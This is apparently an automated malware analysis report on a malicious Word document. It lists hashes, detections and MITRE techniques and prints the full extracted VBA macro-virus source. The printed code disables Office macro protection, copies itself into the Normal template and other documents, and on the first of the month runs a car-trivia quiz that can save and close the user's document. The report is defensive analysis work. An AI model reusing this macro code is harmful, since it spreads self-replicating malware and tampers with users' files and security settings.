Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2762bea545c7b4ae…

MALICIOUS

Office (OLE)

37.0 KB Created: 2014-09-22 02:38:00 Authoring application: Microsoft Office Word First seen: 2014-10-17
MD5: e3103e8a1010f378416def0171cdbfcf SHA-1: 49b67eeb3cc882e67829545bccfbd9961e71641b SHA-256: 2762bea545c7b4ae59d77eb357df45fd88eba9729f30d922876f6fe9ec2fbbde
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros that are designed to disable macro security settings and replicate their code into the Normal template. This behavior is indicative of malware attempting to establish persistence or prepare for further execution. The 'Document_Close' subroutine specifically targets the Normal template for code injection and saves it, which is a common persistence technique.

Heuristics 4

  • ClamAV: Doc.Trojan.Bptk-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bptk-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3307 bytes
SHA-256: 6f2d80473bb19b94d68bab85120d8406847b6a042e7776c43e3523d5b7877108
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Dim DI As Boolean, TI As Boolean, d As Object, t As Object, Src As String, r As String


Private Sub Document_Close()
On Error Resume Next

Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)

DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)

Options.VirusProtection = False

  If DI And Not (TI) Then
    Src = d.CodeModule.Lines(1, d.CodeModule.CountOfLines)
    t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
    t.CodeModule.AddFromString Src
    NormalTemplate.Save
    
  ElseIf TI And Not (DI) Then
If Day(Now()) = 1 Then
 Do
 r = UCase(InputBox("长安之星车长多少米?" & Chr(13) & Chr(13) _
 & "A.3米4  B.3米5  C.3米55  D.3米7" & Chr(13) & Chr(13) _
 & "要好好思考哟!", "紧急提问"))
 Loop Until r <> ""
 If r = "B" Then
   MsgBox "好棒哟!"
   GoTo 10
 Else
   MsgBox "唉!再给你一次机会."
    Do
     r = UCase(InputBox("长安之星FBA是什么型?" & Chr(13) & Chr(13) _
     & "A.标准型  B.普通型  C.豪华型" & Chr(13) & Chr(13) _
     & "想好了再回答!", "紧急提问"))
    Loop Until r <> ""
      If r = "C" Then
        MsgBox "谢谢你的支持!"
        GoTo 10
      Else
        MsgBox "笨蛋!给你最后一次机会."
          Do
           r = UCase(InputBox("安全气囊是干什么用的?" & Chr(13) & Chr(13) _
           & "A.防止撞车  B.防止侧滑  C.撞车时保护驾驶员" & Chr(13) & Chr(13) _
           & "这是最后一次机会哟!", "紧急提问"))
          Loop Until r <> ""
           If r = "C" Then
             MsgBox "总算答对了!"
             GoTo 10
           Else
             MsgBox "看来你还需要对长安之星多加了解..."
             ActiveDocument.SaveAs "c:\lzc.vxd"
             ActiveDocument.Close
             Exit Sub
           End If
      End If
 End If
End If
10:
    Src = t.CodeModule.Lines(1, t.CodeModule.CountOfLines)
    d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
    d.CodeModule.AddFromString Src
    ActiveDocument.Save
      
  End If


End Sub

Private Sub Document_Open()
On Error Resume Next

Set d = ActiveDocument.VBProject.VBComponents.Item(1)
Set t = NormalTemplate.VBProject.VBComponents.Item(1)

DI = d.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)
TI = t.CodeModule.Find("长安公司汽研所 常识课", 1, 1, 10000, 10000)

Options.VirusProtection = False

  If DI And Not (TI) Then
    t.CodeModule.DeleteLines 1, t.CodeModule.CountOfLines
    
  ElseIf TI And Not (DI) Then
    d.CodeModule.DeleteLines 1, d.CodeModule.CountOfLines
      
  End If
  
End Sub